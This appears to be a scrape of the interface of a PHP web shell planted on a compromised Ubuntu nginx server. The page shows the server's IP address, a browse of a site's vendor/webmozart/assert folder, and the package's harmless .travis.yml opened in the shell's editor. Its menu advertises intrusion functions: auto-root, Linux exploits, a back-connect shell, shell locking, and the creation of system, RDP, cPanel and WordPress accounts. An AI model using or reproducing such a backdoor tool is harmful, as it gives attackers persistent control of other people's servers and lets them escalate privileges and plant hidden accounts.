Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
webmozart /
assert /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.composer-auth.json
274
B
-rw-r--r--
.gitignore
25
B
-rw-r--r--
.styleci.yml
187
B
-rw-r--r--
.travis.yml
1.06
KB
-rw-r--r--
CHANGELOG.md
692
B
-rw-r--r--
LICENSE
1.08
KB
-rw-r--r--
README.md
11.47
KB
-rw-r--r--
appveyor.yml
1.39
KB
-rw-r--r--
composer.json
815
B
-rw-r--r--
phpunit.xml.dist
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: false branches: only: - master cache: directories: - $HOME/.composer/cache/files matrix: include: - php: 5.3 - php: 5.4 - php: 5.5 - php: 5.6 - php: hhvm - php: nightly - php: 7.0 env: COVERAGE=yes - php: 7.0 env: COMPOSER_FLAGS='--prefer-lowest --prefer-stable' allow_failures: - php: hhvm - php: nightly fast_finish: true before_install: - if [[ $TRAVIS_PHP_VERSION != hhvm && $COVERAGE != yes ]]; then phpenv config-rm xdebug.ini; fi; - if [[ $TRAVIS_REPO_SLUG = webmozart/assert ]]; then cp .composer-auth.json ~/.composer/auth.json; fi; - composer self-update install: composer update $COMPOSER_FLAGS --prefer-dist --no-interaction script: if [[ $COVERAGE = yes ]]; then vendor/bin/phpunit --verbose --coverage-clover=coverage.clover; else vendor/bin/phpunit --verbose; fi after_script: if [[ $COVERAGE = yes ]]; then wget https://scrutinizer-ci.com/ocular.phar && php ocular.phar code-coverage:upload --format=php-clover coverage.clover; fi
Close